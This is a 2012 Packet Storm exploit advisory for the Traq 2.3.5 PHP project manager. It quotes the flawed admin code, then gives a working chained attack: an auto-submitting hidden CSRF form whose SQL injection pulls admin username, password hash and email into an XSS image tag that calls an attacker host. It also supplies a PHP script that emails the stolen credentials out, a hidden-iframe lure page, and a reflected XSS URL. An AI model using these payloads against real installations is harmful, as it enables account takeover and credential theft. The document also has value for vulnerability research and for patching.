Traq 2.3.5 CSRF / XSS / SQL Injection

2012-06-21T00:00:00
ID PACKETSTORM:114002
Type packetstorm
Reporter Akastep
Modified 2012-06-21T00:00:00

Description

                                        
                                            `====================================================================  
Vulnerable Software: traq-2.3.5  
Official Site: TraqProject.org  
====================================================================  
About Software:  
Traq is a PHP powered project manager, capable of tracking issues for multiple projects   
with multiple milestones.  
====================================================================  
Tested on:  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
MYSQL: 5.5.25  
*/  
  
====================================================================  
Vuln Desc:  
traq-2.3.5 is prone to: CSRF,XSS,SQL injection vulns.  
  
  
[+] LESSON NUMBER 1:VULN IS VULN. IT DOESN'T MATTER WHERE IT EXISTS.  
====================================================================  
I noticed many developers,coders,admins,webmaster always thinks:  
"If you find vuln(s) in administration section you can't exploit it.  
You need to login to administration section to exploit it.Bla bla bla."  
=======I HOPE THIS will be LESSON FOR ALL WHO THINKS LIKE BOTTOM=========  
  
Vulnerable code section:  
//admincp/groups.php  
====================================================================  
// Create  
if(@$_POST['action'] == 'create')  
{  
// Check for errors  
if(empty($_POST['values']['name']))  
$errors['name'] = l('error_name_empty');  
  
if(!count($errors))  
{  
// Sort columns from values  
$keys = array();  
$values = array();  
foreach($_POST['values'] as $key => $val)  
{  
$keys[] = $key;  
$values[] = "'".$val."'";  
}  
  
$db->query("INSERT INTO ".DBPF."usergroups (".implode(',',$keys).") VALUES(".implode(',',$values).")");  
  
header("Location: groups.php?created");  
}  
  
$group = $_POST['values'];  
}  
  
// Save Usergroup  
if(@$_POST['action'] == 'save')  
{  
// Check for errors  
if(empty($_POST['values']['name']))  
$errors['name'] = l('error_name_empty');  
  
if(!count($errors))  
{  
// Make the query.  
$query = array();  
foreach($_POST['values'] as $key => $val)  
$query[] = $key."='".$val."'";  
  
// Run the query.  
$db->query("UPDATE ".DBPF."usergroups SET ".implode(', ',$query)." WHERE id='".$db->res($_REQUEST['edit'])."' LIMIT 1");  
  
header("Location: groups.php?saved");  
}  
}  
  
====================================================================  
  
  
We'll exploit 3 vulns together:  
CSRF+SQL INJECTION+XSS  
As result we will steal admin credentials(login:password:email) from database.  
Payload:  
  
mysql> select 0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261  
666669632E7068703F67657470776E65643D \G  
*************************** 1. row ***************************  
0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068  
703F67657470776E65643D: Administrators</a><img src="http://192.168.0.15/learn/traffic.php?getpwned=  
1 row in set (0.00 sec)  
  
mysql> select 0x22206865696774683D302077696474683D30202F3E \G  
*************************** 1. row ***************************  
0x22206865696774683D302077696474683D30202F3E: " heigth=0 width=0 />  
1 row in set (0.00 sec)  
  
  
//Our "Cookie Stealer" (In this case it is our credentials stealer *aka snifer*)  
//traffic.php  
==================BEGIN TRAFFIC.PHP===============  
<?php  
error_reporting(0);  
if (isset($_GET['getpwned']))  
{  
$nastycookies=htmlentities(str_ireplace('\'','',$_GET['getpwned']));//some bugfixes to get rid single quote xD//  
$sendto='noscriptkidding_please_IT_IS_ONLY_FOR_EDUCATIONAL_PURPOSES@mustdiehacker';//your mail address.  
@mail($sendto,'Your nAsty cookies',PHP_EOL .$nastycookies);//sending mail to you//  
}  
?>  
================ EOF TRAFFIC.HTML=================  
  
  
================ EOF PAGE1.HTML================  
<!DOCTYPE HTML>  
<html>  
<head>  
<title></title>  
  
<style type="text/css">  
body  
{  
background-color:black;  
color:red;  
}  
img  
{  
position:absolute;  
top:20px;  
}  
  
iframe  
{  
position:absolute;  
background-color:black;  
color:black;  
visibility:hidden;  
}  
</style>  
</head>  
<body>  
  
<img src="#" /><br>  
  
  
<iframe src="CSRF_SQL_INJ_XSS_TRAQ.html" />  
</body>  
</html>  
================ EOF PAGE1.HTML================  
  
  
  
  
============BEGIN CSRF_SQL_INJ_XSS_TRAQ.html====================  
  
<body onload="javascript:document.forms[0].submit()">  
<form name="pwn" action="http://====>CHANGE HERE<======/admincp/groups.php?edit=1" method="post">  
<input type="hidden" name="action" value="save" />  
<input type="text" name="values[name]" value="1',name=(select concat(0x41646D696E6973747261746F72733C2F613E3C696D67207372633D22687474703A2F2F3139322E3136382E302E31352F6C6561726E2F747261666669632E7068703F67657470776E65643D,username,0x7c,password,0x7c,email,0x22206865696774683D302077696474683D30202F3E) from traq_users where group_id=1),is_admin='1" />  
<input type="radio" name="values[is_admin]" value="1" id="is_admin_yes" checked="checked" />  
<input type="radio" name="values[is_admin]" value="0" id="is_admin_no" />  
<input type="radio" name="values[create_tickets]" value="1" id="create_tickets_yes" />  
<input type="radio" name="values[create_tickets]" value="0" id="create_tickets_no" checked="checked" />  
<input type="radio" name="values[update_tickets]" value="1" id="update_tickets_yes" />  
<input type="radio" name="values[update_tickets]" value="0" id="update_tickets_no" checked="checked" />  
<input type="radio" name="values[comment_tickets]" value="1" id="comment_tickets_yes" />  
<input type="radio" name="values[comment_tickets]" value="0" id="comment_tickets_no" checked="checked" />  
<input type="radio" name="values[delete_tickets]" value="1" id="delete_tickets_yes" />  
<input type="radio" name="values[delete_tickets]" value="0" id="delete_tickets_no" checked="checked" />  
<input type="radio" name="values[add_attachments]" value="1" id="add_attachments_yes" />  
<input type="radio" name="values[add_attachments]" value="0" id="add_attachments_no" checked="checked" />  
</form>  
============EOF CSRF_SQL_INJ_XSS_TRAQ.html====================  
  
  
If your attack was successfull against victim you will receive admin credentials like below:  
  
  
admin|d033e22ae348aeb5660fc2140aec35850c4da997|admin@localhost.tld  
  
@Print screen successfull attack result (@mail'ed credentials to attacker)  
  
http://s018.radikal.ru/i516/1206/14/85c6beab9a42.png  
  
  
  
  
XSS via $_GET:  
http://192.168.0.15/learn/traq/upload/admincp/plugins.php?edit&plugin=1"/><script>alert(1);</script>  
  
  
[+] LESSON NUMBER 2: Do not trust to client side.Sanitize and validate it.  
  
  
  
=====================THE END=================================  
  
  
  
+++++++++My Special thanks to:+++++++++++++++++++++  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
1337day.com  
secunia.com  
securityhome.eu  
exploitsdownload.com  
to all AA Team + to all Azerbaijan Black HatZ +   
*Especially to my bro CAMOUFL4G3.*  
++++++++++++++++++++++++++++++++++++++++++++++++  
  
Respect && Thank you.  
  
/AkaStep ^_^  
  
  
  
  
`